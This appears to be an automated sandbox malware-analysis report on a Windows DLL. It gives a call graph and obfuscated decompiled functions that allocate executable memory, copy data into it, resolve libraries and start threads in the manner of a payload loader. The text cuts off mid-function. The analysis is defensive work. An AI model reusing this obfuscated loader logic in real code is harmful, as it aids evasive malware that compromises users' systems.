6d50db1d 8807->8808 8813 6d50db30 ___scrt_fastfail 8807->8813 8809 6d50bf62 __dosmaperr 20 API calls 8808->8809 8810 6d50db22 8809->8810 8812 6d50bea6 _abort 26 API calls 8810->8812 8811->8796 8812->8811 8813->8811 8814 6d50db67 8813->8814 8815 6d50db5e 8813->8815 8814->8811 8817 6d50bf62 __dosmaperr 20 API calls 8814->8817 8816 6d50bf62 __dosmaperr 20 API calls 8815->8816 8818 6d50db63 8816->8818 8817->8818 8819 6d50bea6 _abort 26 API calls 8818->8819 8819->8811 8820->8805 8822 6d50b493 8821->8822 8823 6d50b4a1 8821->8823 8822->8823 8827 6d50b4b8 8822->8827 8824 6d50bf62 __dosmaperr 20 API calls 8823->8824 8829 6d50b4a9 8824->8829 8825 6d50bea6 _abort 26 API calls 8826 6d50b4b3 8825->8826 8826->8445 8827->8826 8828 6d50bf62 __dosmaperr 20 API calls 8827->8828 8828->8829 8829->8825 8834 6d50acfc 8830->8834 8835 6d50abcc 8830->8835 8831 6d50ad13 8833 6d50b3fe __freea 20 API calls 8831->8833 8832 6d50b3fe __freea 20 API calls 8832->8834 8833->8835 8834->8831 8834->8832 8835->8444 8837 6d50bec1 8836->8837 8838 6d50bcdc _abort 8 API calls 8837->8838 8839 6d50bed6 GetCurrentProcess TerminateProcess 8838->8839 8839->8449 7932 6d514181 7935 6d518f63 7932->7935 7949 6d506fc7 7935->7949 7937 6d519046 7959 6d50768e SNifCw242OCD Mqae01id 7937->7959 7943 6d519272 7944 6d5192a2 7943->7944 7947 6d51937f 7943->7947 7948 6d51418b 7943->7948 7982 6d5173b5 7944->7982 7946 6d5193aa SNifCw242OCD 7946->7947 7947->7946 7947->7948 7950 6d50704b 7949->7950 7954 6d507227 7949->7954 8006 6d506ce5 7950->8006 7954->7937 7957 6d5071d3 8034 6d504dfd 7957->8034 8101 6d513e64 7959->8101 7962 6d50794b 7969 6d502ae5 7962->7969 7963 6d507881 8110 6d5029e2 7963->8110 7964 6d5143a4 SetEndOfFile 7968 6d507953 7964->7968 7966 6d51a07d 2 API calls 7967 6d507b43 LeaveCriticalSection 7966->7967 7967->7968 7968->7962 7968->7964 7968->7966 7970 6d502c25 7969->7970 7971 6d502b48 7969->7971 7974 6d502c78 7970->7974 7978 6d502c13 7970->7978 8124 6d518a58 7971->8124 7973 6d502b94 8134 6d5045c9 7973->8134 8140 6d506bba 7974->8140 7977 6d502e8e 7986 6d50391b 7977->7986 7978->7977 7979 6d502d1d 7978->7979 7979->7978 7980 6d506bba LoadLibraryA 7979->7980 7981 6d502e8b 7980->7981 7981->7977 7983 6d51742c 7982->7983 7984 6d517449 7982->7984 7983->7984 7985 6d518891 11 API calls 7983->7985 7984->7948 7985->7984 7987 6d503993 7986->7987 7991 6d503b6e 7986->7991 7988 6d5039a1 GetProcAddress 7987->7988 7989 6d503a35 7987->7989 7988->7991 8155 6d515150 7989->8155 7992 6d503c27 GetProcAddress 7991->7992 8002 6d503f18 7991->8002 7993 6d503c7b VirtualAlloc 7992->7993 8005 6d503d79 7992->8005 8000 6d503ca3 7993->8000 7993->8005 7994 6d5041c2 7996 6d50226b 11 API calls 7994->7996 7995 6d504152 7998 6d506b43 2 API calls 7995->7998 7999 6d504186 7996->7999 7997 6d503ed5 GetPEB 7997->8002 7998->7999 7999->7943 8001 6d503ced ExitProcess 8000->8001 8004 6d503d46 VirtualAlloc 8000->8004 8002->7994 8002->7995 8004->8005 8005->7997 8005->8005 8007 6d506fb9 8006->8007 8008 6d506d79 8006->8008 8016 6d51a27e 8007->8016 8015 6d506ded 8008->8015 8042 6d5151f2 8008->8042 8010 6d506e70 8049 6d501000 8010->8049 8011 6d506f57 8013 6d506f7a EnterCriticalSection LeaveCriticalSection 8011->8013 8013->8007 8015->8010 8015->8011 8017 6d51a350 8016->8017 8018 6d51a2f4 8016->8018 8019 6d50226b 9 API calls 8017->8019 8018->8017 8021 6d51a35a 8018->8021 8022 6d51a30e 8018->8022 8020 6d51a498 8019->8020 8089 6d514f75 8020->8089 8024 6d51a3d9 8021->8024 8025 6d51a36b 8021->8025 8083 6d504843 8022->8083 8024->8017 8027 6d51a3ff OpenThread 8024->8027 8025->8017 8026 6d51a376 EnterCriticalSection 8025->8026 8026->8017 8027->8017 8029 6d507137 8030 6d51a07d 8029->8030 8031 6d51a0d9 8030->8031 8032 6d51a0e7 8030->8032 8031->8032 8033 6d51a1ff ActivateActCtx ResumeThread 8031->8033 8032->7957 8033->8032 8035 6d504e68 8034->8035 8037 6d504f98 8034->8037 8036 6d515750 2 API calls 8035->8036 8040 6d504e9c 8036->8040 8039 6d5151f2 11 API calls 8037->8039 8041 6d504f3c 8037->8041 8038 6d5143a4 SetEndOfFile 8038->8041 8039->8037 8040->8038 8041->7954 8043 6d515270 8042->8043 8048 6d5152e7 8042->8048 8044 6d51541a 8043->8044 8045 6d515282 8043->8045 8047 6d515443 GetLastError 8044->8047 8044->8048 8045->8048 8058 6d504294 8045->8058 8047->8044 8048->8015 8050 6d501096 8049->8050 8053 6d5011a8 8049->8053 8062 6d5185cb 8050->8062 8052 6d5012d0 8073 6d5143a4 8052->8073 8053->8052 8065 6d50226b 8053->8065 8056 6d501151 GHQvB58h2E 8056->8007 8057 6d501289 CreateThread 8057->8052 8057->8053 8059 6d50432c 8058->8059 8061 6d50441d 8058->8061 8059->8048 8060 6d51a27e 11 API calls 8060->8061 8061->8059 8061->8060 8063 6d51881a CreateActCtxA 8062->8063 8064 6d5185f3 8062->8064 8063->8064 8064->8056 8066 6d5022ee 8065->8066 8069 6d5022f8 8065->8069 8067 6d50238b CreateFileA SetFilePointer 8066->8067 8066->8069 8068 6d5151f2 8 API calls 8067->8068 8070 6d50248f 8068->8070 8069->8057 8077 6d518891 8070->8077 8074 6d5143cb 8073->8074 8075 6d5143e0 8073->8075 8074->8075 8076 6d5144d5 SetEndOfFile 8074->8076 8075->8056 8076->8074 8078 6d51890f 8077->8078 8082 6d5024ee SetEndOfFile 8077->8082 8079 6d504294 11 API calls 8078->8079 8078->8082 8080 6d5189e2 8079->8080 8081 6d518891 11 API calls 8080->8081 8081->8082 8082->8069 8084 6d504980 8083->8084 8085 6d5048ae 8083->8085 8086 6d504988 DeleteCriticalSection 8084->8086 8088 6d504916 8084->8088 8095 6d515750 8085->8095 8086->8088 8088->8017 8090 6d515092 8089->8090 8091 6d514fd2 8089->8091 8092 6d514fe0 8090->8092 8094 6d5150bb SNifCw242OCD 8090->8094 8091->8092 8093 6d515087 CloseHandle 8091->8093 8092->8029 8093->8092 8094->8092 8096 6d5157b0 8095->8096 8097 6d5157d4 GetProcessHeap 8096->8097 8100 6d5157cd ___scrt_fastfail 8096->8100 8098 6d51583f 8097->8098 8099 6d515868 RtlAllocateHeap 8098->8099 8098->8100 8099->8100 8100->8088 8102 6d513f17 8101->8102 8108 6d507850 8101->8108 8116 6d506b43 8102->8116 8105 6d513f56 8107 6d506b43 2 API calls 8105->8107 8106 6d513f7c 8106->8108 8120 6d516881 8106->8120 8107->8108 8108->7962 8108->7963 8108->7968 8111 6d502a11 8110->8111 8112 6d502a39 8110->8112 8113 6d506b43 2 API calls 8111->8113 8114 6d502a20 8112->8114 8115 6d502a6e ActivateActCtx 8112->8115 8113->8114 8114->7962 8115->8114 8115->8115 8117 6d506b63 GetProcessHeap 8116->8117 8118 6d506b7a 8116->8118 8117->8118 8119 6d506b70 RtlFreeHeap 8117->8119 8118->8105 8118->8106 8118->8108 8119->8118 8121 6d5168cf 8120->8121 8123 6d5168de 8120->8123 8122 6d506b43 2 API calls 8121->8122 8122->8123 8123->8106 8123->8123 8125 6d518ac6 8124->8125 8132 6d518ca5 8124->8132 8143 6d5050ec 8125->8143 8127 6d518bf1 VirtualAlloc 8129 6d518c2b ___scrt_fastfail 8127->8129 8128 6d518b3a 8128->8127 8128->8128 8130 6d518e09 8129->8130 8129->8132 8131 6d506bba LoadLibraryA 8130->8131 8133 6d518ea8 InitializeCriticalSection 8131->8133 8132->7973 8133->8132 8135 6d504610 8134->8135 8136 6d50467a 8134->8136 8149 6d505a34 8135->8149 8138 6d5046a1 OpenThread 8136->8138 8139 6d50462f 8136->8139 8138->8139 8139->7978 8139->8139 8141 6d506bfa LoadLibraryA 8140->8141 8142 6d506c2c 8140->8142 8141->8142 8142->7979 8142->8142 8144 6d505183 8143->8144 8147 6d5051a0 8143->8147 8145 6d506b43 2 API calls 8144->8145 8145->8147 8146 6d5051f7 8146->8128 8147->8146 8148 6d5151f2 11 API calls 8147->8148 8148->8146 8151 6d505e8e 8149->8151 8154 6d505a57 8149->8154 8150 6d505ae2 LoadLibraryA 8150->8154 8151->8139 8152 6d505dd0 GetProcAddress 8153 6d505da9 8152->8153 8152->8154 8153->8152 8153->8153 8153->8154 8154->8150 8154->8151 8154->8152 8154->8153 8156 6d51518a 8155->8156 8157 6d51519f 8155->8157 8158 6d515750 2 API calls 8156->8158 8159 6d515195 8157->8159 8160 6d5151b2 CreateFileA 8157->8160 8158->8159 8159->7991 8160->8159 8160->8160 8167 6d5082b2 8169 6d5082be ___scrt_is_nonwritable_in_current_image 8167->8169 8168 6d5082e7 dllmain_raw 8171 6d508301 dllmain_crt_dispatch 8168->8171 8172 6d5082cd ___scrt_is_nonwritable_in_current_image 8168->8172 8169->8168 8170 6d5082e2 8169->8170 8169->8172 8181 6d514ed7 8170->8181 8171->8170 8171->8172 8174 6d508322 8175 6d50834e 8174->8175 8178 6d514ed7 2 API calls 8174->8178 8175->8172 8176 6d508357 dllmain_crt_dispatch 8175->8176 8176->8172 8177 6d50836a dllmain_raw 8176->8177 8179 6d50839c 8177->8179 8180 6d50833a dllmain_crt_dispatch dllmain_raw 8178->8180 8179->8172 8180->8175 8182 6d514ee4 GetProcessHeap HeapAlloc 8181->8182 8183 6d514f28 ___scrt_fastfail 8181->8183 8182->8183 8183->8174 8185 6d508123 8186 6d50812f ___scrt_is_nonwritable_in_current_image 8185->8186 8205 6d50853c 8186->8205 8188 6d508136 8189 6d50813b ___scrt_is_nonwritable_in_current_image 8188->8189 8190 6d508163 8188->8190 8216 6d50880e IsProcessorFeaturePresent 8188->8216 8220 6d50849f 8190->8220 8193 6d508172 __RTC_Initialize 8193->8189 8223 6d508716 8193->8223 8197 6d50818a 8198 6d508716 29 API calls 8197->8198 8199 6d508196 ___scrt_initialize_default_local_stdio_options 8198->8199 8227 6d50a322 8199->8227 8203 6d5081b7 8203->8189 8235 6d50a2c6 8203->8235 8206 6d508545 8205->8206 8239 6d5089eb IsProcessorFeaturePresent 8206->8239 8210 6d508556 8215 6d50855a 8210->8215 8250 6d50b379 8210->8250 8213 6d508571 8213->8188 8215->8188 8217 6d508824 ___scrt_fastfail 8216->8217 8218 6d5088cc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8217->8218 8219 6d508916 8218->8219 8219->8190 8313 6d508575 8220->8313 8222 6d5084a6 8222->8193 8318 6d5086db 8223->8318 8226 6d5087c7 InitializeSListHead 8226->8197 8230 6d50a339 8227->8230 8228 6d508b95 _ValidateLocalCookies 5 API calls 8229 6d5081ac 8228->8229 8229->8189 8231 6d508474 8229->8231 8230->8228 8232 6d508479 ___scrt_release_startup_lock 8231->8232 8233 6d5089eb ___isa_available_init IsProcessorFeaturePresent 8232->8233 8234 6d508482 8232->8234 8233->8234 8234->8203 8236 6d50a2f5 8235->8236 8237 6d508b95 _ValidateLocalCookies 5 API calls 8236->8237 8238 6d50a31e 8237->8238 8238->8189 8240 6d508551 8239->8240 8241 6d509556 8240->8241 8242 6d50955b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 8241->8242 8261 6d509871 8242->8261 8246 6d509571 8247 6d50957c 8246->8247 8275 6d5098ad 8246->8275 8247->8210 8249 6d509569 8249->8210 8298 6d50e35c 8250->8298 8253 6d509595 8254 6d5095af 8253->8254 8255 6d50959e 8253->8255 8254->8215 8256 6d509856 ___vcrt_uninitialize_ptd 6 API calls 8255->8256 8257 6d5095a3 8256->8257 8258 6d5098ad ___vcrt_uninitialize_locks DeleteCriticalSection 8257->8258 8259 6d5095a8 8258->8259 8309 6d509b85 8259->8309 8262 6d50987a 8261->8262 8264 6d5098a3 8262->8264 8266 6d509565 8262->8266 8279 6d509b05 8262->8279 8265 6d5098ad ___vcrt_uninitialize_locks DeleteCriticalSection 8264->8265 8265->8266 8266->8249 8267 6d509823 8266->8267 8284 6d509a1a 8267->8284 8269 6d50982d 8270 6d509838 8269->8270 8271 6d509ac8 ___vcrt_FlsSetValue 6 API calls 8269->8271 8270->8246 8272 6d509846 8271->8272 8273 6d509853 8272->8273 8289 6d509856 8272->8289 8273->8246 8276 6d5098d7 8275->8276 8277 6d5098b8 8275->8277 8276->8249 8278 6d5098c2 DeleteCriticalSection 8277->8278 8278->8276 8278->8278 8280 6d5098f9 try_get_function 5 API calls 8279->8280 8281 6d509b1f 8280->8281 8282 6d509b3c InitializeCriticalSectionAndSpinCount 8281->8282 8283 6d509b28 8281->8283 8282->8283 8283->8262 8285 6d5098f9 try_get_function 5 API calls 8284->8285 8286 6d509a34 8285->8286 8287 6d509a4c TlsAlloc 8286->8287 8288 6d509a3d 8286->8288 8288->8269 8290 6d509860 8289->8290 8291 6d509866 8289->8291 8293 6d509a54 8290->8293 8291->8270 8294 6d5098f9 try_get_function 5 API calls 8293->8294 8295 6d509a6e 8294->8295 8296 6d509a85 TlsFree 8295->8296 8297 6d509a7a 8295->8297 8296->8297 8297->8291 8300 6d50e375 8298->8300 8302 6d50e379 8298->8302 8299 6d508b95 _ValidateLocalCookies 5 API calls 8301 6d508563 8299->8301 8300->8299 8301->8213 8301->8253 8302->8300 8304 6d50e224 8302->8304 8305 6d50e22b 8304->8305 8306 6d50e26e GetStdHandle 8305->8306 8307 6d50e2d6 8305->8307 8308 6d50e281 GetFileType 8305->8308 8306->8305 8307->8302 8308->8305 8310 6d509bb4 8309->8310 8311 6d509b8e 8309->8311 8310->8254 8311->8310 8312 6d509b9e FreeLibrary 8311->8312 8312->8311 8314 6d508583 8313->8314 8317 6d508588 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 8313->8317 8315 6d50880e ___scrt_fastfail 4 API calls 8314->8315 8314->8317 8316 6d50860b 8315->8316 8317->8222 8319 6d5086f8 8318->8319 8320 6d5086ff 8318->8320 8324 6d50b1f1 8319->8324 8327 6d50b261 8320->8327 8323 6d508185 8323->8226 8325 6d50b261 __onexit 29 API calls 8324->8325 8326 6d50b203 8325->8326 8326->8323 8330 6d50af49 8327->8330 8333 6d50ae7f 8330->8333 8332 6d50af6d 8332->8323 8334 6d50ae8b ___scrt_is_nonwritable_in_current_image 8333->8334 8341 6d50c2f6 EnterCriticalSection 8334->8341 8336 6d50ae99 8342 6d50b0b0 8336->8342 8338 6d50aea6 8352 6d50aec4 8338->8352 8340 6d50aeb7 ___scrt_is_nonwritable_in_current_image 8340->8332 8341->8336 8343 6d50b0ce 8342->8343 8346 6d50b0c6 __onexit __crt_fast_encode_pointer 8342->8346 8344 6d50b127 8343->8344 8343->8346 8355 6d50e0db 8343->8355 8344->8346 8347 6d50e0db __onexit 29 API calls 8344->8347 8346->8338 8349 6d50b13d 8347->8349 8348 6d50b11d 8350 6d50b3fe __freea 20 API calls 8348->8350 8351 6d50b3fe __freea 20 API calls 8349->8351 8350->8344 8351->8346 8404 6d50c33e LeaveCriticalSection 8352->8404 8354 6d50aece 8354->8340 8356 6d50e0e6 8355->8356 8357 6d50e10e 8356->8357 8359 6d50e0ff 8356->8359 8358 6d50e11d 8357->8358 8364 6d510768 8357->8364 8371 6d51079b 8358->8371 8361 6d50bf62 __dosmaperr 20 API calls 8359->8361 8363 6d50e104 ___scrt_fastfail 8361->8363 8363->8348 8365 6d510773 8364->8365 8366 6d510788 HeapSize 8364->8366 8367 6d50bf62 __dosmaperr 20 API calls 8365->8367 8366->8358 8368 6d510778 8367->8368 8383 6d50bea6 8368->8383 8372 6d5107b3 8371->8372 8373 6d5107a8 8371->8373 8374 6d5107bb 8372->8374 8382 6d5107c4 _abort 8372->8382 8397 6d50b438 8373->8397 8376 6d50b3fe __freea 20 API calls 8374->8376 8379 6d5107b0 8376->8379 8377 6d5107c9 8380 6d50bf62 __dosmaperr 20 API calls 8377->8380 8378 6d5107ee HeapReAlloc 8378->8379 8378->8382 8379->8363 8380->8379 8381 6d50e440 _abort 7 API calls 8381->8382 8382->8377 8382->8378 8382->8381 8386 6d50be2b 8383->8386 8385 6d50beb2 8385->8358 8387 6d50c8d8 _abort 20 API calls 8386->8387 8388 6d50be41 8387->8388 8389 6d50bea0 8388->8389 8390 6d50be4f 8388->8390 8391 6d50beb6 _abort 11 API calls 8389->8391 8395 6d508b95 _ValidateLocalCookies 5 API calls 8390->8395 8392 6d50bea5 8391->8392 8393 6d50be2b _abort 26 API calls 8392->8393 8394 6d50beb2 8393->8394 8394->8385 8396 6d50be76 8395->8396 8396->8385 8398 6d50b476 8397->8398 8402 6d50b446 _abort 8397->8402 8399 6d50bf62 __dosmaperr 20 API calls 8398->8399 8401 6d50b474 8399->8401 8400 6d50b461 HeapAlloc 8400->8401 8400->8402 8401->8379 8402->8398 8402->8400 8403 6d50e440 _abort 7 API calls 8402->8403 8403->8402 8404->8354

            Executed Functions

            Function 6D515750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 100%
            			E6D515750() {
				void* __edi;
				signed char _t69;
				void* _t79;
				void* _t80;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				void* _t102;
				void* _t104;
				signed int _t113;
				void* _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				intOrPtr* _t119;
				intOrPtr _t120;
				void* _t122;
				void* _t123;

				_t94 =  *(_t123 + 0xc) & 0x0000ffff;
				_t119 =  *((intOrPtr*)(_t123 + 0x10));
				_t113 = _t94 ^ 0x000029d1;
				 *(_t119 + 0x48) =  *((intOrPtr*)(_t119 + 0x4c)) - 0x260d;
				 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x168)) =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x168)) + 0xffffff28 - _t119;
				_t120 =  *((intOrPtr*)(_t119 + 0x74));
				_t116 =  *(_t119 + 0x8c);
				 *(_t119 + 0x190) = _t113;
				 *(_t119 + 0x90) =  *( *((intOrPtr*)(_t119 + 0x50)) + 0xc4) * 0x29b2;
				_t98 =  *(_t120 + 0x80) ^ 0x00000b8b;
				while(_t98 <= ( *(_t120 + 0x1c) ^ 0x00000322)) {
					_t113 = _t113 + 0x252e;
					_t98 = _t98 + 1;
					 *(_t119 + 0x190) = _t113;
				}
				if(_t116 != 0) {
					_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x124)) + 0x1c)) - 0x260d;
					 *( *((intOrPtr*)(_t119 + 0x88)) + 0x130) =  *( *((intOrPtr*)(_t119 + 0x88)) + 0x130) |  *(_t119 + 0xd0) ^ 0x00002ea5;
					_t69 = M6D53866A; // 0x6f
					 *(_t119 + 0x24) =  *(_t119 + 0x24) | _t94 | _t69 & 0x000000ff;
					_t114 = GetProcessHeap();
					_t102 = 0x1df3;
					 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x88)) + 0x148)) = 0x5b49c1e;
					 *(_t119 + 0x168) =  *(_t119 + 0x168) & 0x00000000;
					if(( *( *((intOrPtr*)(_t119 + 0x124)) + 0x2c) ^ 0x00003586) == 0x1df3) {
						L9:
						if(_t114 != 0) {
							_t80 = RtlAllocateHeap(_t114, 0, _t116); // executed
							_t122 = _t80;
							if( *((intOrPtr*)(_t119 + 0x130)) >  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x4c)) + 0x3c4) {
								 *(_t119 + 0x48) =  *(_t119 + 0x48) ^  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x1d4)) + 0xf8)) - _t94;
							}
							 *((intOrPtr*)( *(_t119 + 8) + 0x180)) =  *((intOrPtr*)( *(_t119 + 8) + 0x180)) - ( *(_t119 + 0xd8) ^ _t94);
							 *( *((intOrPtr*)(_t119 + 0x124)) + 0x3c) =  *( *((intOrPtr*)(_t119 + 0x124)) + 0x3c) ^ 0xfffffab9;
							E6D509250(_t116, _t122,  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x50)) + 0x1c)) - 0x260d, _t116);
						}
						_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x10)) + 0x4c)) - 0x76;
						if(_t104 >= 0x2597) {
							L17:
							return _t122;
						} else {
							_t115 =  *(_t119 + 0xd8);
							_t118 =  *(_t119 + 8) * _t94;
							_t79 = 0x2597 - _t104;
							do {
								_t115 = _t115 ^ _t118;
								_t79 = _t79 - 1;
							} while (_t79 != 0);
							 *(_t119 + 0xd8) = _t115;
							goto L17;
						}
					}
					_t95 = _t94 - 0x252e;
					do {
						 *( *_t119 + 0x30) =  *( *_t119 + 0x30) | _t95;
						_t102 = _t102 + 1;
					} while (_t102 != ( *( *((intOrPtr*)(_t119 + 0x124)) + 0x2c) ^ 0x00003586));
					_t94 =  *(_t123 + 0x18) & 0x0000ffff;
					goto L9;
				}
				return 0;
			}





















            0x6d515751
            0x6d515758
            0x6d51575e
            0x6d515770
            0x6d51577a
            0x6d515783
            0x6d515786
            0x6d515796
            0x6d51579c
            0x6d5157a8
            0x6d5157bd
            0x6d5157b0
            0x6d5157b6
            0x6d5157b7
            0x6d5157b7
            0x6d5157cb
            0x6d5157e9
            0x6d5157f4
            0x6d5157fc
            0x6d515806
            0x6d51580f
            0x6d515811
            0x6d51581c
            0x6d51582c
            0x6d51583d
            0x6d515864
            0x6d515866
            0x6d51586c
            0x6d515875
            0x6d515886
            0x6d515896
            0x6d515896
            0x6d5158a5
            0x6d5158b1
            0x6d5158c5
            0x6d5158ca
            0x6d5158d8
            0x6d5158dd
            0x6d5158fa
            0x00000000
            0x6d5158df
            0x6d5158e2
            0x6d5158e8
            0x6d5158eb
            0x6d5158ed
            0x6d5158ed
            0x6d5158ef
            0x6d5158ef
            0x6d5158f4
            0x00000000
            0x6d5158f4
            0x6d5158dd
            0x6d515845
            0x6d515847
            0x6d515849
            0x6d51584c
            0x6d51585b
            0x6d51585f
            0x00000000
            0x6d51585f
            0x00000000

            APIs
            • GetProcessHeap.KERNEL32(?,?,?,?,6D5045B2,?,00002EA5,?,?,6D51A749,?,?,?,0000074E,?,000003A9), ref: 6D515809
            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 6D51586C
            Strings
            • oach pursuit visits funny assume sadness haul probably sketch sparrow troublesome potatoes milk distracted tremble rage varying concession wit banged profit odour startle procession admired armour projects charm insane reproof inject drugstore trout parlor hop, xrefs: 6D5157FC
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: Heap$AllocateProcess
            • String ID: oach pursuit visits funny assume sadness haul probably sketch sparrow troublesome potatoes milk distracted tremble rage varying concession wit banged profit odour startle procession admired armour projects charm insane reproof inject drugstore trout parlor hop
            • API String ID: 1357844191-1397620714
            • Opcode ID: e00f12af5fed268d3a4ac25c7ad6283c421d3d24404282c3933b491f486a7b50
            • Instruction ID: 3bd6a178568c2d6294888b88cf8e613908255cec89ac3f85d2395a9daef9d129
            • Opcode Fuzzy Hash: e00f12af5fed268d3a4ac25c7ad6283c421d3d24404282c3933b491f486a7b50
            • Instruction Fuzzy Hash: FA513A356047018FD768CF39C894AA6B7F1FF48311F11896EE5AACBB91DB31A805CB10
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D518A58 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 338memoryCOMMONCrypto
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 80%
            			E6D518A58() {
				void* __edi;
				signed int _t211;
				long _t221;
				void* _t222;
				intOrPtr _t250;
				signed int _t280;
				void* _t296;
				intOrPtr _t298;
				signed int _t299;
				intOrPtr _t303;
				void* _t305;
				signed int _t306;
				intOrPtr _t307;
				intOrPtr _t308;
				intOrPtr _t313;
				intOrPtr _t315;
				void* _t332;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				void* _t343;
				signed int _t344;
				signed short _t349;
				signed int _t350;
				void* _t354;
				signed int _t356;
				signed int _t359;
				signed int _t363;
				signed int _t366;
				signed int* _t368;
				signed int _t372;
				signed int _t374;
				signed int _t382;
				signed int _t383;
				signed int _t385;
				void* _t386;
				void* _t387;

				_t307 =  *((intOrPtr*)(_t386 + 0x28));
				_t341 =  *(_t386 + 0x30);
				_t298 =  *((intOrPtr*)(_t386 + 0x38)) + 0xfffff9cd;
				 *(_t386 + 0xc) = _t307 - 0x484;
				 *((intOrPtr*)(_t386 + 4)) = _t341 + 0xc8a;
				 *((intOrPtr*)(_t386 + 0x3c)) = _t298;
				_t374 = _t307 - 0xb37;
				 *(_t386 + 0x30) =  *(_t386 + 0x40) + 0xfffffb4a;
				_t308 =  *((intOrPtr*)(_t386 + 0x28));
				 *(_t386 + 0xc) = _t374;
				 *(_t386 + 0x44) = _t308 - 0x29b2;
				 *((intOrPtr*)(_t386 + 0x28)) = _t341 + 0x71f;
				if( *(_t386 + 0x30) == _t341 + 0xbc5) {
					L33:
					return  *(_t386 + 0x30) + 0xfffffbdc;
				}
				_t368 =  *(_t386 + 0x2c);
				_t359 =  *(_t386 + 0x24) + 0xffffff3b;
				_push(_t359 - 0xe2);
				_push(_t374);
				_push(_t359 - 0xbc5);
				_push(_t374 + 0xb56);
				_push(_t368);
				_push(_t298 + 0x241);
				_push(_t359 + 0x10);
				_t342 =  *(_t386 + 0x4c);
				_push(_t341 + 0x640);
				_push(_t308);
				_push(_t374 - 0x88);
				_push(_t359 - 0x8ca);
				_push(_t342 + 0x3a5);
				_push(_t308 - 0x10e);
				_push(_t342 + 0x4b6);
				_push(_t359 + 0x3f2);
				_push(_t374 + 0x71c);
				_t299 = E6D5050EC();
				_t387 = _t386 + 0x40;
				 *(_t387 + 0x40) = _t299;
				_t368[0x15] =  *((intOrPtr*)(_t368[0x11] + 6));
				_t211 = _t368[7] ^ 0x000007e6;
				_t313 =  *((intOrPtr*)(_t368[0x49] + 0x80)) - 0xcbc;
				 *((intOrPtr*)(_t387 + 0x24)) = _t313;
				if(_t313 == _t211) {
					L5:
					_t343 = 0x24ad;
					_t368[0x1b] = _t368[0x11] + 0xf8;
					_t368[0x24] = _t368[0x24] * 0x5494;
					if(( *(_t368[0x14] + 0x1c) ^ 0x000002a0) == 0x24ad) {
						L9:
						 *((intOrPtr*)(_t387 + 0x4c)) =  *((intOrPtr*)(_t387 + 0x4c)) + 0x252e;
						_t221 =  *((intOrPtr*)(_t368[0x11] + 0x50)) + 0x00000fff & 0xfffff000;
						_t368[0x30] = _t221;
						_t222 = VirtualAlloc(0, _t221, 0x3000, 0x40); // executed
						_t368[0x10] = _t222;
						if(_t368[0x1d] >= 0x2597) {
							 *((intOrPtr*)(_t368[4] + 0x90)) =  *((intOrPtr*)( *_t368 + 0x168)) - 0x1eee;
						}
						_t368[0xe] = _t368[0xa] - 0x2749;
						_t368[0x34] = _t368[0x34] + 0x21e9 - _t368[0x22];
						E6D509250(_t359, _t368[0x10], 0, _t368[0x30]);
						E6D508CD0(_t368[0x10], _t368[8],  *((intOrPtr*)(_t368[0x11] + 0x54)));
						_t386 = _t387 + 0x18;
						_t344 =  *(_t386 + 0x44);
						if(_t344 <=  *((intOrPtr*)(_t387 + 0x28)) + 0xfffff303) {
							L32:
							goto L33;
						} else {
							_t84 = _t299 - 0x7e8; // -2024
							if(_t344 <= _t84) {
								if(_t368[0x1d] < (_t368[0x4f] * _t368[0xe] & _t374)) {
									_t315 =  *((intOrPtr*)(_t386 + 0x18));
									if(_t315 != (_t368[0x19] ^ _t359) && _t315 > _t299 *  *(_t386 + 0x10)) {
										_t368[0x24] = _t368[0x24] ^ _t368[0x22] + 0x000029d1;
									}
								} else {
									_t368[0x56] = _t368[0x56] - _t368[0x18] +  *((intOrPtr*)(_t386 + 0x18));
									 *(_t386 + 0x24) =  *_t368 | 0x00002749;
									_push(( *(_t386 + 0x2c))[0x5a] *  *(_t386 + 0x40) &  *(_t386 + 0x40));
									_t303 =  *((intOrPtr*)(_t386 + 0x48));
									_t250 = E6D506BBA(_t303,  *(_t386 + 0x30), _t368[0x13] + _t368[9], _t368[0x36] + _t344, 0xffffb260 - _t368[0x4c], ( *(_t386 + 0x2c))[0x45] * _t368[0x4c] | _t368[0x4c],  *((intOrPtr*)(_t386 + 0x38)) - ( *(_t386 + 0x2c))[0x75] ^  *(_t386 + 0x4c), ( *_t368 *  *(_t386 + 0x44) ^  *(_t386 + 0x44)) * (( *(_t386 + 0x2c))[0xf] + 0x2872) *  *(_t386 + 0x10) * 0xffffb260);
									_t386 = _t386 + 0x24;
									_t382 =  *(_t386 + 0x40);
